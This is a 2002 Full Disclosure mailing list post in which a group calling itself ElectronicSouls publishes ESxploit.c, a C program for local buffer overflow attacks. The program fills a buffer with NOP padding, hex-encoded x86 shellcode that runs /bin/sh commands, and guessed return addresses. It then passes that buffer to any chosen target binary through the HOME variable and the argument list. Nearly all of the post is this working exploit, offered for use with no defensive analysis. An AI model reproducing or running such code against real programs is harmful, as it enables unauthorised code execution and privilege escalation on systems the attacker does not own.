Full Disclosure mailing list archives
[ElectronicSouls] - Advances in Binary Auditing (PART TWO)
From: es () hush com
Date: Thu, 28 Nov 2002 22:34:18 -0800
Dear List,

We apologize for our oversight; in the first message sent titled 'Advances in Binary Auditing', we neglected to include the exploit portion of the auditing tool. Here it is, enjoy, and do not abuse the knowledge!

# cat ESxploit.c
/* Exploit part of ESxploit,
 * local bof testing application
 * (C) BrainStorm - ElectronicSouls */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEF_OFFSET 10

static char exec[]=
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65"
"\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73"
"\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b"
"\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01";

/* Returns the current stack pointer; the value is left in %eax (x86 only). */
long esp(void){__asm__("movl %esp,%eax");}

int main(int argc,char **argv){
  char bof[3000];
  int i,offset;
  long ret;

  /* argv[1]: offset subtracted from the stack pointer (default DEF_OFFSET) */
  if(argc>1){offset=atoi(argv[1]);}
  else{offset=DEF_OFFSET;}
  ret=(esp()-offset);

  printf(" *** ESxploit - BOF testing application \n");
  printf(" *** Return Address: 0x%lx, Offset: %d. ",ret,offset);
  printf("\n\n");

  /* Write the return address across the buffer, then overwrite the front
   * with 0x90 padding followed by the exec[] bytes. */
  for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;}
  for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;}
  memcpy(bof+i,exec,strlen(exec));

  /* The buffer is handed to the program under test (argv[2]) both through
   * the HOME environment variable and as its first argument. */
  setenv("HOME", bof, 1);
  execlp(argv[2], argv[3], bof, 0);
}
#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"The winner won the race."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html